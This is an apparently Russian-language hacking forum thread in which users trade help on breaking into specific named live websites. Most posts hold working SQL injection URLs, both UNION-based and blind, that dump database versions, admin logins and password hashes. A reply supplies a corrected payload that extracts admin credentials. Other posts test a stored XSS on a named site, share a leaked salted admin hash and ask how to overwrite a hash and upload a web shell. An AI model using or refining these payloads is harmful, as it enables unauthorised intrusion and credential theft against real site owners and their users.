а вот это какого вида??? admin:68356d102feeaf197f4fd0c4dda59ed8:2K70yZkYvva P7o9I вида md5(md5($pass).$salt) или какого?
помогие со скулей http://www.wfsj.org/resources/page.php?id=-69+union+select+1,2,3,4,5,6,7,8,9,0,1/* нимогу ни версию ни всего остольного получить
SVAROG http://www.wfsj.org/resources/page.php?id=-69+union+select+1,2,UNHEX(HEX(version())),4,5,6,7,8,9,0,1/*
Вот хотел узнать, как можно узнать адрес админки? Ну, а потом, если повезет, то и багу какую-нибудь для доступа к сайту. Буду очень признателен за инфу. Спасибо.
http://gta.com.ua/file_sa_details.phtml?id=-59+union+select+1,2,3,4,5,6,7,8,9,10,11+from+gtacom_gta.tables+where+TABLE_NAME=users,12,13,14,15,16,17,18,19,20/* Что я неправельно сделал? Мне надо из базы посмотреть названия таблиц, а я немогу((((9
0_о Это пипец какой-то. Я покушал валидола, успокоился и отвечаю, запрос апсолютна нихрена неправильный - это раз. Во - вторых версия мускула 4, имена всех таблиц ты никак не увидишь, только перебор таблиц - Code: http://gta.com.ua/file_sa_details.phtml?id=-59+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* И вот тебе бонус - Code: http://gta.com.ua/file_sa_details.phtml?id=-59+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+admin/* Читай маны, а то после еще одного такого поста у мну инфаркт случится
http://site.com/account/index.php?n=shops&shop=9+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+account+limit+0,1),1,1))>51 Ситуация такова: веб-сервер с мускулом 5, нашел уязвимость . Знаю названия: базы,таблиц,колонок. Посредством слепой иньекции выудил логин(username) и хэш(password) админа из таблицы account (см. выше) Вопрос: Т.к. не удается сбрутить хэш ( хэш из пароля видимо получается в несколько неизвестных шагов,а не просто "sha1(password)"), возник вопрос. Как модифицировать в этой же таблице "account" значение в колонке "banned" с 1 на 0 ?
Это майскуль, разделение запросов в ней отсутствует, то есть модифицировать информацию в базе данных посредством скуль инъекции тебе не удастся
Возник такой вопрос. Ввел в строку имени в коментах к статьям привычный <script>alert()</script>, имя в комментарии не отобразилось, а при каждом входе на страницу теперь опера выдает уведомление о выполнении джава скрипта... Это активная XSS? Вот ссылка http://gayby.org/news/comments/192.html
Мож кто -нибудь осветит мой вопрос по mod_rewrite? Вот уязвимый скрипт Code: http://www.savchenko.ru/developments/84.html
Вопрос не в этом вопрос в том как это обходить!Он просто выводит пустую страницу,при обычных запросах,здесь нужен посимв.перебор?
www.4what.com Здравствуйте! Я долго копался на этом форуме и нашел где мне помогут насчет SQL-инъекции на сайте Site:www.4what.com Зайдя на https://www.4what.com/news.php?id=55' появилась ошибка: Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/fwhat/public_html/news.php on line 149 Далее зашел на http://www.4what.com/news.php?id=-1+union+select+1,2,user+from+mysql.user/* высветилось логин:4what потом http://www.4what.com/news.php?id=-1+union+select+null,mysql.user.password,null+from+mysql.user/* высветилось хэш:*832547126835E90D7CCB5772A85B0E6552904217 (а зачем звездочка?) Дальше не знаю Можно ли этот хэш поменять на свой? И какой командой(UPDATE? не получается че то) И последний вопрос Подскажите что надо сделать что бы загрузитьт туда шелл Спасибо вам за ответы кто ответит....